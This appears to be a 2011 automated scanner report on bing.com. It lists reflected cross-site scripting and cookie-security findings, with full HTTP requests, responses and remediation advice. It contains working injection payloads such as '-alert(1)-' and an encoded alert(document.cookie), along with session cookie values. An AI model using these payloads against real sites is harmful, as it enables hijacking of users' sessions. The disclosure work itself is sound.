bing.com, XSS, REST 205, Cross Site Scripting, CWE-79

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Feb 13 07:57:11 CST 2011.


1. Cross-site scripting (reflected)

1.1. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 2]

1.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 3]

1.3. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 4]

1.4. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

1.5. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

1.6. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

1.7. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

1.8. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

1.9. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 2]

1.10. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 3]

1.11. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 4]

1.12. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

1.13. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

1.14. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

1.15. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 2]

1.16. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 3]

1.17. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 4]

1.18. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 2]

1.19. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 3]

1.20. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 4]

1.21. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 5]

1.22. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

2. Cookie scoped to parent domain

2.1. http://www.bing.com/travel/

2.2. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

2.3. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

2.4. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

2.5. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

2.6. http://www.bing.com/

2.7. http://www.bing.com/browse

2.8. http://www.bing.com/events/search

2.9. http://www.bing.com/images/results.aspx

2.10. http://www.bing.com/local

2.11. http://www.bing.com/local/ypdefault.aspx

2.12. http://www.bing.com/maps/

2.13. http://www.bing.com/maps/default.aspx

2.14. http://www.bing.com/maps/explore/

2.15. http://www.bing.com/news/results.aspx

2.16. http://www.bing.com/news/search

2.17. http://www.bing.com/results.aspx

2.18. http://www.bing.com/search

2.19. http://www.bing.com/settings.aspx

2.20. http://www.bing.com/shopping

2.21. http://www.bing.com/shopping/binoculars/c/4378

2.22. http://www.bing.com/shopping/classic-womens-fragrances/r/162

2.23. http://www.bing.com/shopping/pet-litter-supplies/c/6874

2.24. http://www.bing.com/travel

2.25. http://www.bing.com/travel/content/search

2.26. http://www.bing.com/videos/browse

2.27. http://www.bing.com/videos/results.aspx

2.28. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

2.29. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

2.30. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

2.31. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

2.32. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

2.33. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

3. Cookie without HttpOnly flag set

3.1. http://www.bing.com/travel/

3.2. http://www.bing.com/travel/content/search

3.3. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

3.4. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

3.5. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

3.6. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

3.7. http://www.bing.com/

3.8. http://www.bing.com/browse

3.9. http://www.bing.com/events/search

3.10. http://www.bing.com/images/results.aspx

3.11. http://www.bing.com/local

3.12. http://www.bing.com/local/

3.13. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

3.14. http://www.bing.com/local/aa461'-alert(&/

3.15. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

3.16. http://www.bing.com/local/us/co/colorado%20springs/

3.17. http://www.bing.com/local/us/dc/washington/restaurants/

3.18. http://www.bing.com/local/ypdefault.aspx

3.19. http://www.bing.com/maps/

3.20. http://www.bing.com/maps/default.aspx

3.21. http://www.bing.com/maps/explore/

3.22. http://www.bing.com/news/results.aspx

3.23. http://www.bing.com/news/search

3.24. http://www.bing.com/results.aspx

3.25. http://www.bing.com/search

3.26. http://www.bing.com/settings.aspx

3.27. http://www.bing.com/shopping

3.28. http://www.bing.com/shopping/binoculars/c/4378

3.29. http://www.bing.com/shopping/classic-womens-fragrances/r/162

3.30. http://www.bing.com/shopping/pet-litter-supplies/c/6874

3.31. http://www.bing.com/travel

3.32. http://www.bing.com/videos/browse

3.33. http://www.bing.com/videos/results.aspx

3.34. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

3.35. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

3.36. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

3.37. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

3.38. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

3.39. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

4. Referer-dependent response

5. Cross-domain Referer leakage

5.1. http://www.bing.com/fd/fb/mulmfg

5.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

5.3. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

5.4. http://www.bing.com/local/details.aspx

5.5. http://www.bing.com/local/locationselector.aspx

5.6. http://www.bing.com/local/us/co/colorado%20springs/

5.7. http://www.bing.com/local/us/dc/washington/restaurants/

5.8. http://www.bing.com/settings.aspx

6. Cross-domain script include

6.1. http://www.bing.com/shopping/classic-womens-fragrances/r/162

6.2. http://www.bing.com/travel/

6.3. http://www.bing.com/videos/browse

6.4. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

6.5. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

6.6. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

6.7. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

6.8. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

6.9. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz



1. Cross-site scripting (reflected)
There are 22 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3421'-alert(1)-'a961c250743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 43fff0538eb64dfba44b7d2f523409d2
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js
Content-Length: 17845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
ive.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js';</script>
...[SNIP]...

1.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c84f'-alert(1)-'139e0b9752f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 54e7a338f8b44685b153335ef9ec6444
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:10:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js
Content-Length: 17845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
calsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js';</script>
...[SNIP]...

1.3. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dec8'-alert(1)-'448f3b6507a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 7d42712fefeb46a98ab737e52fe7dfff
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:11:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a
Content-Length: 17840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
search';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a';</script>
...[SNIP]...

1.4. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c2ac'-alert(1)-'f9f092c6a82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/2c2ac'-alert(1)-'f9f092c6a82&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 5fb4a35222b54432bd70cffed70a2abc
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/2c2ac'-alert(1)-'f9f092c6a82&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 17294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/2c2ac'-alert(1)-'f9f092c6a82&';</script>
...[SNIP]...

1.5. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 815d0(a)ba9b933b7e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(815d0(a)ba9b933b7e5&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 95df9438b2614df9963f6f63f445308b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(815d0(a)ba9b933b7e5&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 16855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
cation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(815d0(a)ba9b933b7e5&';</script>
...[SNIP]...

1.6. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bd9'-alert(1)-'44a4f985b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: a467f92137f1454a84f3da60fb3eb3d1
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js
Content-Length: 17646


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
